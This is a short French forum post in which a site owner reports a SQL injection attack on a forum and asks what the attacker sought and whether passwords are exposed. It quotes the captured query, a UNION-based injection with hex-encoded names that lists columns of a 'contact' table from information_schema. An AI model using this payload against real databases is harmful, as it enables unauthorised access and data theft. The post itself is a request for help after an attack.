Bonjour,
Ce matin nous vennons de nous apercevoir que nous vennions d'être attaqué via une injection SQL :
Qu'a t'il essayé de voir ? Les mots de passes sont compromis ?
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4 SELECT LibelleDiscussion, CodeDiscussion, (SELECT MAX(DatePost) FROM forum__post WHERE CodeDiscussion = forum__discussion.CodeDiscussion) AS LastMessage,DescriptionDiscussion FROM forum__discussion WHERE CodeSousCategorie = -999.9 UNION ALL SELECT (select concat(0x7e,0x27,Hex(cast(group_concat(column_name) as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0x70726F6E6F73 AND table_name=0x636F6E74616374)-- ORDER BY LastMessage DESC
Merci
Partager